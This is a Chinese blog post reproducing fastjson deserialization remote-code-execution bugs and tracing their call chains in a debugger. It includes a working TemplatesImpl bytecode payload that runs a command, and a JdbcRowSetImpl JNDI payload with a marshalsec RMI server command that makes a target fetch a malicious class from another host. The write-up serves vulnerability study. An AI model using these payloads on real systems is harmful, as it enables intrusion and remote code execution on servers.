fastjson反序列化漏洞各版本漏洞复现以及原理分析

最新推荐文章于 2024-08-11 01:45:18 发布
最新推荐文章于 2024-08-11 01:45:18 发布
阅读量3.5k 收藏 2
点赞数 1
分类专栏: web漏洞复现 文章标签: fastjson反序列化漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38376348/article/details/108216253
版权

前言:

如何判断后端是否采用了fastjson框架:

一方面是通过json解析异常抛出,另一方面可以通过DNSLOG判断:

poc:

{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}

 

0x00 环境快速搭建

maven仓库https://mvnrepository.com/artifact/com.alibaba/fastjson,每个版本都有

直接导入对应漏洞版本即可

0x01 1.2.22~1.2.24

参考廖师傅的文章,写的比较好,点这里,传送门

利用链:com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl

POC.test

package com.test.fast;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;

public class POC extends AbstractTranslet {
    public POC() throws IOException {
        Runtime.getRuntime().exec("open /System/Applications/Calculator.app");
    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {
    }

    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    public static void main(String[] args) throws Exception {
        new POC();
    }
}

验证:

package com.test.fast;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import org.apache.commons.codec.binary.Base64;
import org.apache.commons.io.IOUtils;

public class test {
    public test() {
    }

    public static void main(String[] args) {
        try {
            test_autoTypeDeny();
        } catch (Exception var2) {
            var2.printStackTrace();
        }

    }

    public static String readClass(String cls) {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();

        try {
            IOUtils.copy(new FileInputStream(new File(cls)), bos);
        } catch (IOException var3) {
            var3.printStackTrace();
        }

        return Base64.encodeBase64String(bos.toByteArray());
    }

    public static void test_autoTypeDeny() throws Exception {
        ParserConfig config = new ParserConfig();
        String fileSeparator = System.getProperty("file.separator");
        String evilClassPath = System.getProperty("user.dir") + "/target/classes/com/test/fast/POC.class";
        String evilCode = readClass(evilClassPath);
        System.out.println(evilCode);
        String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
        String text1 = "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_bytecodes\":[\"" + evilCode + "\"],'_name':'a.b','_tfactory':{ },\"_outputProperties\":{ },\"_name\":\"a\",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}\n";
        System.out.println(text1);
        JSON.parseObject(text1, Object.class, config, Feature.SupportNonPublicField);
    }
}

执行命令:

debug TemplatesImpl调用链触发触发过程

在TemplatesImpl类打断点,断点位置,defineTransletClasses

或者直接打断点在漏洞调用栈最后一步这里也可以:  AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();

分析整个fastjson 漏洞触发过程:

parseObject传入POC中自己定义的json字符串,class,features等

下一步:

跟进parseObject方法,将DefaultJSONParser当前整个类参入deserialze方法

下一步:

 

parseObject:

又传递到deserialze

 看一下里面调用了parseField开始解析json格式:

看一下这里的细节:

下一步:parseField

下一步,比较关键的一步,这一步是set操作,也就是将json和对象类型匹配起来,进行赋值:

具体实现:

还是这个方法,走到else if 分支:

此时,通过method.invoke调用我们指定的POC要反序列化的类的指定的方法

 跳过接下来的几步,打到getOutputProperties

调用new 了TransformerImpl并传入getTransletInstance方法,

执行到了getTransletInstance方法,_class为空,所以执行了defineTransletClasses方法

进入defineTransletClasses,执行到414行

加载之后,我们跳出方法方法区,紧接着在455行通过newInstance方法初始化了恶意类 ,初始了执行恶意代码,达到命令执行效果:

 

debug的部分可能不太清晰:

注意:这里的类加载器为TemplatesImpl自定义的类加载器

POC链路总结大致流程: 

TemplatesImpl.getOutputProperties()
  TemplatesImpl.newTransformer()
    TemplatesImpl.getTransletInstance()
      TemplatesImpl.defineTransletClasses()
        ClassLoader.defineClass()
        Class.newInstance()

一点点限制:

     https://www.dazhuanlan.com/2019/12/23/5e006d929b014/

 

利用链: com.sun.rowset.JdbcRowSetImpl  注意:RMI和LADP均有JDK版本限制

实验本地JDK版本:

java version "1.8.0_31"
Java(TM) SE Runtime Environment (build 1.8.0_31-b13)
Java HotSpot(TM) 64-Bit Server VM (build 25.31-b07, mixed mode

不成功的环境版本,比如:

java version "1.8.0_201"
Java(TM) SE Runtime Environment (build 1.8.0_201-b09)
Java HotSpot(TM) 64-Bit Server VM (build 25.201-b09, mixed mode)

起RMI服务: 

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsejndi.RMIRefServer http://192.168.0.101:8000/#Exp

 编译恶意类:

 起web服务

 漏洞触代码:

String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://192.168.0.101:1099/Exp\",\"autoCommit\":true}";
System.out.println (payload);
JSON.parse(payload);

debug

进入:DefaultJSONParser,调用构造方法初始化lexer,input,config,symbolTable

^

………………

此处省略,因为与上个调用链类似

进入关键部分:

反射调用setAutoCommit方法

此时coon为null,进入了connect,看一下connect方法具体实现,this.getDataSourceName() != null为true,执行

此时dataSource为我们传入的恶意地址

看一下lookup实现,层层调用了三次lookup

直接跳到:getObjectFactoryFromReference,方法里面使用了类加载器加载了远程拉回来的恶意类,并实例化

限制:

1 服务端JDK版本限制:

参考:https://blog.csdn.net/he_and/article/details/105532066

2 服务端解析用法限制:

https://www.dazhuanlan.com/2019/12/23/5e006d929b014/

参考文章:

https://www.dazhuanlan.com/2019/12/23/5e006d929b014/

https://blog.csdn.net/he_and/article/details/105532066

Adsatrtgo
关注
专栏目录
Java代码审计之Fastjson反序列化漏洞详解
悦分享
09-16 2165
FastJson 是一个由阿里巴巴研发的java库,FastJson是开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到Java Bean。“自2017年3月15日,fastjson官方主动爆出其在1.2.24及之前版本存在远程代码执行高危安全漏洞以来,各种新型绕过姿势层出不穷。漏洞被利用本质找到一条有效的攻击链,攻击链的末端就是有代码执行能力的类,来达到我们想做的事情,一般都是用来RCE(远程命令执行)。
Fastjson反序列化漏洞分析
fly小灰灰的专栏
07-30 1万+
1. 漏洞描述 漏洞简述: 2017年3月15日,fastjson官方主动爆出fastjson在1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。 影响版本fastjson <= 1.2.24 2. 漏洞简介  java处理JSON数据有三个比较流行的类库,gson(google维护)、jackson、以及今天的主角fastjson,fastj
Fastjson反序列化漏洞
m0_67401761的博客
09-11 1万+
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
Fastjson反序列化漏洞原理漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-12 3万+
本文是Fastjson1.2.24漏洞复现,包括漏洞原理漏洞利用(远程创建文件)、漏洞利用(反弹shell)。使用vulhub靶场进行搭建,保姆级教程,还望大家多多支持。
科普文:Java基础系列之【字节码应用案例Fastjson反序列化漏洞
最新发布
为无为,事无事,味无味。
08-11 1063
transform方法利用Java的反射机制进行函数调用,传入的参数是input是一个实例化对象,利用这个方法便可以调用任意对象的任意方法(exec)从而执行命令,所以在DeSertPoc类里新建Transformer,最后组成的核心表达式为:((Runtime)Runtime.class.getMethod("getRuntime",null).invoke(null,null)).exec("whoami");基于TemplateImpl的方法可以直接执行bytecodes。
FastJson 反序列化漏洞原理分析
buffedon的博客
08-01 9021
FastJson 反序列化漏洞原理分析FastJson 简介漏洞原理FastJson 序列化操作序列化反序列化调用链分析原理利用过程分析RMI 的实现JNDI服务器端代码构造总结1. fastjson 利用过程2. 恶意类怎么上传到服务端3. fastjson rce的原理参考 FastJson 简介 fastjson框架下载:https://github/alibaba/fastjson fastjson-jndi 下载:https://github.com/earayu/fastjson_jndi_po
fastjson反序列化漏洞原理及利用
weixin_43769253的博客
07-29 6991
fastjson反序列化漏洞原理及利用
Fastjson反序列化漏洞原理复现_fastjson反序化漏洞解决(1)
m0_60575487的博客
04-07 681
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
weblogic和fastjson反序列化漏洞原理分析复现
09-07
2. Fastjson反序列化漏洞原理分析复现Fastjson是一个常用的Java JSON库,该漏洞存在于Fastjson版本1.2.24及之前的版本中。攻击者可以通过构造恶意的JSON数据,触发Fastjson反序列化漏洞,从而执行任意代码...
fastjson1.2.24反序列化漏洞
weixin_45805993的博客
11-05 532
漏洞详情 Apache Solr的8.1.1和8.2.0版本的自带配置文件solr.in.sh中存在ENABLE_REMOTE_JMX_OPTS="true"选项。如果使用受影响版本中的默认solr.in.sh文件,那么将启用JMX监视并将其暴露在RMI_PORT上(默认值= 18983),并且无需进行任何身份验证。 如果防火墙中的入站流量打开了此端口,则具有Solr节点网络访问权限的任何人都将能够访问JMX,并且可以上传恶意代码在Solr服务器上执行。该漏洞不影响Windows系统的用户,仅影响部分版本
Fastjson反序列化漏洞利用原理和POC
u012990687的专栏
11-30 1万+
0x01 前言 FastJson是开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到Java Bean。Fastjson应用范围非常广,在github上star数超过22k。2017年3月15日,fastjson官方主动爆出fastjson在1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。2020年6月1日 fastjson爆发新的反序列化远程代码执行漏洞,fastjso
Fastjson反序列化漏洞原理及利用
qq_38229543的博客
10-28 259
原文链接:https://www.cnblogs.com/sijidou/p/13121332.html
Fastjson漏洞原理分析
LTianHang的博客
06-04 5247
fastjson中产生漏洞的根本原因在于其autoType机制,以及针对于autoType机制做的checkAutoType检测防御机制。
Fastjson反序列化漏洞原理复现
FisrtBqy的博客
05-15 3469
Ffasjson反序列化漏洞原理复现
fastjson到底做错了什么?为什么会被频繁爆出漏洞
HollisChuang's Blog
07-06 2万+
GitHub 15.8k Star 的Java工程师成神之路,不来了解一下吗! GitHub 15.8k Star 的Java工程师成神之路,真的不来了解一下吗! GitHub 15.8k Star 的Java工程师成神之路,真的真的不来了解一下吗! fastjson大家一定都不陌生,这是阿里巴巴的开源一个JSON解析库,通常被用于将Java Bean和JSON 字符串之间进行转换。 前段时间,fastjson被爆出过多次存在漏洞,很多文章报道了这件事儿,并且给出了升级建议。 但是作为一个开发者,我更关注的
Fastjson 反序列化漏洞
Cover-3321的博客
01-09 2639
fastjson在解析json(反序列化)的过程中,支持使用@Type来实例化一个具体类,且自动调用这个类的set/get方法来访问属性。黑客通过查找代码中的get方法,来远程加载恶意命令,即造成反序列化漏洞
渗透测试 | FastJson漏洞原理复现
m0_60571990的博客
03-09 1418
渗透测试 | FastJson漏洞原理复现
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值